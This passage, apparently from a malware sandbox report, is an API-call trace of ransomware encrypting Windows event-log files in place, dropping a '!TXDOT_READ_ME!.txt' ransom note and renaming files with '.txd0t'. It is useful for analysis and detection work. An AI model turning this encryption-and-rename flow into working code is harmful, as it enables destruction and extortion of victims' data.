lpNumberOfBytesRead=0x414f640, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f640*=0x11000, lpOverlapped=0x0) returned 1 [0089.070] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.070] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f644, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f644*=0x11000, lpOverlapped=0x0) returned 1 [0089.071] FlushFileBuffers (hFile=0x478) returned 1 [0089.080] GetProcessHeap () returned 0xe30000 [0089.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x12a) returned 0xed7f88 [0089.080] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" [0089.080] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" [0089.080] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.080] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.080] GetProcessHeap () returned 0xe30000 [0089.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.080] CloseHandle (hObject=0x478) returned 1 [0089.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.txd0t")) returned 1 [0089.081] SetEvent (hEvent=0x404) returned 1 [0089.081] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.087] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" [0089.087] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t" [0089.087] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t") returned 0 [0089.087] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.090] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.090] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0089.090] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.090] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.091] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.091] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x11000, lpOverlapped=0x0) returned 1 [0089.101] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.101] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x11000, lpOverlapped=0x0) returned 1 [0089.102] FlushFileBuffers (hFile=0x474) returned 1 [0089.109] GetProcessHeap () returned 0xe30000 [0089.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xed7f88 [0089.109] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" [0089.109] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned="Microsoft-Windows-Kernel-WHEA%4Operational.evtx" [0089.109] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.109] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.109] GetProcessHeap () returned 0xe30000 [0089.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.109] CloseHandle (hObject=0x474) returned 1 [0089.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.txd0t")) returned 1 [0089.110] SetEvent (hEvent=0x404) returned 1 [0089.110] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.111] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" [0089.111] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.txd0t" [0089.111] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.txd0t") returned 0 [0089.111] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.111] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.112] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0089.112] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.112] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.113] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.113] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x11000, lpOverlapped=0x0) returned 1 [0089.115] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.115] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x11000, lpOverlapped=0x0) returned 1 [0089.115] FlushFileBuffers (hFile=0x474) returned 1 [0089.119] GetProcessHeap () returned 0xe30000 [0089.119] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed1ec0 [0089.119] StrCpyW (in: psz1=0xed1ec0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" [0089.119] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned="Microsoft-Windows-LiveId%4Operational.evtx" [0089.119] StrCpyW (in: psz1=0xed1ed8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.119] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.119] GetProcessHeap () returned 0xe30000 [0089.119] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1ec0 | out: hHeap=0xe30000) returned 1 [0089.119] CloseHandle (hObject=0x474) returned 1 [0089.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.txd0t")) returned 1 [0089.120] SetEvent (hEvent=0x404) returned 1 [0089.120] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.121] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" [0089.121] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.txd0t" [0089.121] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.txd0t") returned 0 [0089.121] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.121] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.121] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0089.121] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.121] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.124] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.124] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x11000, lpOverlapped=0x0) returned 1 [0089.126] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.126] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x11000, lpOverlapped=0x0) returned 1 [0089.126] FlushFileBuffers (hFile=0x474) returned 1 [0089.130] GetProcessHeap () returned 0xe30000 [0089.130] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xed28a0 [0089.130] StrCpyW (in: psz1=0xed28a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" [0089.130] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned="Microsoft-Windows-MUI%4Operational.evtx" [0089.130] StrCpyW (in: psz1=0xed28b8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.130] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.130] GetProcessHeap () returned 0xe30000 [0089.130] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed28a0 | out: hHeap=0xe30000) returned 1 [0089.130] CloseHandle (hObject=0x474) returned 1 [0089.130] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.txd0t")) returned 1 [0089.130] SetEvent (hEvent=0x404) returned 1 [0089.131] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.132] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" [0089.132] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.txd0t" [0089.132] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.txd0t") returned 0 [0089.132] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.132] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.132] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0089.132] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.132] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.133] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.133] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x11000, lpOverlapped=0x0) returned 1 [0089.135] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.136] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x11000, lpOverlapped=0x0) returned 1 [0089.136] FlushFileBuffers (hFile=0x474) returned 1 [0089.141] GetProcessHeap () returned 0xe30000 [0089.141] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2558 [0089.141] StrCpyW (in: psz1=0xed2558, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" [0089.141] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned="Microsoft-Windows-NCSI%4Operational.evtx" [0089.141] StrCpyW (in: psz1=0xed2570, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.141] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.142] GetProcessHeap () returned 0xe30000 [0089.142] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2558 | out: hHeap=0xe30000) returned 1 [0089.142] CloseHandle (hObject=0x474) returned 1 [0089.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.txd0t")) returned 1 [0089.142] SetEvent (hEvent=0x404) returned 1 [0089.142] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.145] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" [0089.145] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t" [0089.145] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t") returned 0 [0089.145] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.145] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0089.145] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0089.145] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.145] WriteFile (in: hFile=0x460, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.146] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.146] ReadFile (in: hFile=0x460, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x11000, lpOverlapped=0x0) returned 1 [0089.149] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.149] WriteFile (in: hFile=0x460, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x11000, lpOverlapped=0x0) returned 1 [0089.150] FlushFileBuffers (hFile=0x460) returned 1 [0089.161] GetProcessHeap () returned 0xe30000 [0089.161] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x124) returned 0xed7f88 [0089.161] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" [0089.161] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned="Microsoft-Windows-NetworkProfile%4Operational.evtx" [0089.161] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.161] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.161] GetProcessHeap () returned 0xe30000 [0089.161] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.161] CloseHandle (hObject=0x460) returned 1 [0089.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.txd0t")) returned 1 [0089.162] SetEvent (hEvent=0x404) returned 1 [0089.162] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.165] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" [0089.165] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.txd0t" [0089.165] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.txd0t") returned 0 [0089.166] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx", dwFileAttributes=0x80) returned 1 [0089.166] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0089.166] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0089.166] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.166] WriteFile (in: hFile=0x460, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.167] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.167] ReadFile (in: hFile=0x460, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x11000, lpOverlapped=0x0) returned 1 [0089.170] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.170] WriteFile (in: hFile=0x460, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x11000, lpOverlapped=0x0) returned 1 [0089.171] FlushFileBuffers (hFile=0x460) returned 1 [0089.194] GetProcessHeap () returned 0xe30000 [0089.194] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x100) returned 0xecf180 [0089.194] StrCpyW (in: psz1=0xecf180, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" [0089.194] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned="Microsoft-Windows-Ntfs%4WHC.evtx" [0089.194] StrCpyW (in: psz1=0xecf198, 